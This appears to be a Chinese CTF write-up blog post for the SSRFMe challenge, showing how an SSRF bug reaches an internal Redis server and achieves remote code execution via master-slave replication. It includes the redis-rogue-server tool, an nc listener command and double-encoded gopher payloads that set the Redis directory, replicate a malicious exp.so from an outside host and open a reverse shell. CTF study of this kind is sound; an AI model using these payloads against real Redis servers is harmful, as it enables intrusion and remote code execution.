Redis的RCE漏洞

前言

做ssrf时碰到个redis的主从复制([网鼎杯 2020 玄武组]SSRFMe)

writeup

<?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

给了redis的密码 root 我们来试试主从复制反弹shell
(A exploit for Redis(<=5.0.5) RCE)

git clone https://github.com/n0b0dyCN/redis-rogue-server

在这里插入图片描述
先监听外网服务器本机监听 6379

nc -lvvp 6379

之后 执行

python3 redis-rogue-server.py --rhost 127.0.0.1 --lhost 外网ip

默认端口号为21000

接下来payload

设置目录
gopher://0.0.0.0:6379/_auth root
config set dir /tmp/
quit
二次编码后:
gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquit

gopher://0.0.0.0:6379/_auth root
config set dbfilename exp.so
slaveof 外网ip 21000
quit
二次编码后:
gopher://0.0.0.0:6379/_auth%2520root%250Aconfig%2520set%2520dbfilename%2520exp.so%250Aslaveof%25208.8.8.8%252021000%250Aquit

导入模块
gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 外网ip 6663
quit
二次编码后:
gopher://0.0.0.0:6379/_auth%2520root%250Amodule%2520load%2520/tmp/exp.so%250Asystem.rev%25208.8.8.8%25206663%250Aquit

导入模板前监听 6663

等上传完成后反弹到shell
在这里插入图片描述

参考

浅析Redis中SSRF的利用
[网鼎杯 2020 玄武组]SSRFMe

  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

打赏
文章很值,打赏犒劳作者一下
相关推荐
©️2020 CSDN 皮肤主题: 鲸 设计师:meimeiellie 返回首页

打赏

ISMidi

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者